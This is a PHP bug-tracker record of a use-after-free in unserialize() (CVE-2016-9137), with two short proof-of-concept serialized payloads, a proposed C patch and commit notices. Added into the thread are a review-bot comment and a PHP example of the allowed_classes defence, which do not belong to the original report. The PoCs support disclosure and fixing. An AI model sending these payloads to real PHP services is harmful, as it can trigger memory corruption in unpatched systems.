Sec Bug #73147 Use After Free in unserialize()
Submitted: 2016-09-23 13:22 UTC Modified: 2016-11-02 09:25 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.6.26 OS:
Private report: No CVE-ID: 2016-9137
 [2016-09-23 13:22 UTC] taoguangchen at icloud dot com
Description:
------------
PoC:
```
<?php

$poc = 'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}';
unserialize($poc);

?>
```


Patches

1 (last revision 2019-09-06 03:41 UTC by 825307076 at qq dot com)
demo17 (last revision 2019-06-06 06:46 UTC by 417177366 at qq dot com)

History

 [2016-09-26 02:55 UTC] stas@php.net
-PHP Version: 7.0.11 +PHP Version: 5.6.26
-Assigned To: +Assigned To: stas
-CVE-ID: +CVE-ID: needed
 [2016-09-26 02:55 UTC] stas@php.net
The fix is in security repo as 0e6fe3a4c96be2d3e88389a5776f878021b4c59f and in https://gist.github.com/57d761ebfeed962fe7ffb498348f2965

please verify
 [2016-09-26 11:10 UTC] taoguangchen at icloud dot com
A similar bug can also be triggered via Exception::__toString with DateInterval::__wakeup.

```
ZEND_METHOD(exception, __toString)
{
...
	zend_update_property_str(base_ce, exception, "string", sizeof("string")-1, str);
```

PoC:
```
<?php

$poc = 'O:9:"Exception":2:{S:17:"\00Exception\00string";R:1;i:0;O:12:"DateInterval":1:{s:4:"days";R:1;}}';
unserialize($poc);

?>
```
 [2016-09-26 19:42 UTC] stas@php.net
Hmmm... I suspect there might also be other places. I'm not sure how to handle this problem in general, as a reference allows overwriting anything by definition; that's how references are supposed to work.
 [2016-09-26 22:30 UTC] taoguangchen at icloud dot com
The following patch can fix this bug:

```
+	zval tmp;
+	ZVAL_STRINGL(&tmp, "string", sizeof("string") - 1);
+	Z_OBJ_HANDLER_P(exception, unset_property)(exception, &tmp, NULL);
+	zval_ptr_dtor(&tmp);
	zend_update_property_str(base_ce, exception, "string", sizeof("string")-1, str);
```
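Review bot: the hunk carries no file header or @@ context, so the reader has to infer from the earlier excerpt that it lands in ZEND_METHOD(exception, __toString) directly before the zend_update_property_str() call; please include the surrounding context lines. On the logic itself, unsetting the "string" property before the update does stop the write from being routed through a reference that unserialize() planted in that slot (the update then creates a fresh value instead of following the reference), and the temporary name zval is released with zval_ptr_dtor(), so the four added lines are sound. It is a per-call-site fix, though: every other method that writes a property the payload can pre-populate with a reference has the same exposure, so a regression test using the PoC above should accompany the hunk, and the general answer has to come from how unserialize() handles references rather than from patching each writer.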
 [2016-09-26 22:35 UTC] stas@php.net
Yes, I know this particular one can be easily fixed. The problem is that every __wakeup that modifies any property would produce the same problem.
 [2016-09-26 22:41 UTC] taoguangchen at icloud dot com
You can handle DateInterval::__wakeup() like PHP 5.
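The discussion above ends on the point that any __wakeup() writing a property can be steered through a reference planted by the payload. The fixed releases cited in the commits below close this instance; the defensive layer that keeps such class-specific gadgets from ever running is to deny unserialize() the right to instantiate them. The following is an added example, not code from the bug report or from php-src. It relies on the `allowed_classes` option of `unserialize()`, which exists since PHP 7.0.0 (the 5.6 branch has no equivalent); the `UserPrefs` class and the helper names are constructed for the example.

```php
<?php
// Added example (not from the bug report or php-src): restricting which
// classes unserialize() may instantiate.  Classes outside the allowlist are
// materialised as __PHP_Incomplete_Class, whose __wakeup()/__toString()/
// __destruct() never run, so the CURLFile and Exception/DateInterval shapes
// from this report decode to inert objects instead of reaching native code.

declare(strict_types=1);

/** A plain data holder the application legitimately serialises (constructed for this example). */
final class UserPrefs
{
    public $theme = 'light';
    public $pageSize = 25;
}

/**
 * Deserialise untrusted input, permitting only the classes named in $allowed.
 * An empty list (equivalent to passing false) blocks every class.
 */
function safe_unserialize(string $data, array $allowed = [])
{
    return unserialize($data, ['allowed_classes' => $allowed]);
}

/** Report the class of every top-level object in a decoded array, keyed like the input. */
function top_level_classes(array $decoded): array
{
    $classes = [];
    foreach ($decoded as $key => $item) {
        if (is_object($item)) {
            $classes[$key] = get_class($item);
        }
    }
    return $classes;
}

// The object-with-back-reference shape from the report, and the payload the
// application itself emits.  Both are constructed inputs for this example.
$hostile = 'a:1:{i:0;O:8:"CURLFile":1:{s:4:"name";R:1;}}';
$benign  = serialize(['prefs' => new UserPrefs()]);

// 1. Deny all classes: the CURLFile object is not instantiated as CURLFile.
print_r(top_level_classes(safe_unserialize($hostile)));

// 2. Allowlist only the application's own class: legitimate data round-trips.
print_r(top_level_classes(safe_unserialize($benign, [UserPrefs::class])));

// 3. The same allowlist still neutralises the hostile payload.
print_r(top_level_classes(safe_unserialize($hostile, [UserPrefs::class])));
```

Cases 1 and 3 report `__PHP_Incomplete_Class` for key `0`, case 2 reports `UserPrefs` for key `prefs`. The allowlist is a containment measure, not a substitute for the fixed release: it removes the gadget classes from reach, while the commits recorded below correct the underlying reference handling. Where the format is under the application's control, a data-only encoding such as JSON avoids the object graph entirely.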
 [2016-10-11 23:45 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-11 23:45 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-10-12 15:57 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f42cbd749cde1f91274c1d03df9024baba141a8f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-12 23:26 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=d13507d2e6d7c280888cc9c3cab125b347662e90
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-12 23:35 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 01:02 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=54003ab6631b489af54631a548597e8bd599b266
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 02:22 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f42cbd749cde1f91274c1d03df9024baba141a8f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 02:23 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 02:23 UTC] ab@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=54003ab6631b489af54631a548597e8bd599b266
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-14 06:00 UTC] tyrael@php.net
-Summary: Use After Free in PHP7 unserialize() +Summary: Use After Free in unserialize()
 [2016-10-17 10:06 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=54003ab6631b489af54631a548597e8bd599b266
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-17 10:07 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=f42cbd749cde1f91274c1d03df9024baba141a8f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-10-17 10:07 UTC] bwoebi@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=0e6fe3a4c96be2d3e88389a5776f878021b4c59f
Log: Fix bug #73147: Use After Free in PHP7 unserialize()
 [2016-11-02 09:25 UTC] kaplan@php.net
-CVE-ID: needed +CVE-ID: 2016-9137
 [2016-11-02 09:25 UTC] kaplan@php.net
From CVE-assign:
"Use CVE-2016-9137 for the ext/curl/curl_file.c vulnerability that was
fixed in 5.6.27 and 7.0.12.

Use CVE-2016-9138 for the remaining security problem associated with
__wakeup that is still present in 5.6.27 and 7.0.12."
 [2019-06-06 06:46 UTC] 417177366 at qq dot com
The following patch has been added/updated:

Patch Name: demo17
Revision:   1559803573
URL:        https://bugs.php.net/patch-display.php?bug=73147&patch=demo17&revision=1559803573
 [2019-09-06 03:41 UTC] 825307076 at qq dot com
The following patch has been added/updated:

Patch Name: 1
Revision:   1567741285
URL:        https://bugs.php.net/patch-display.php?bug=73147&patch=1&revision=1567741285
 
Last updated: Thu Sep 19 19:01:27 2019 UTC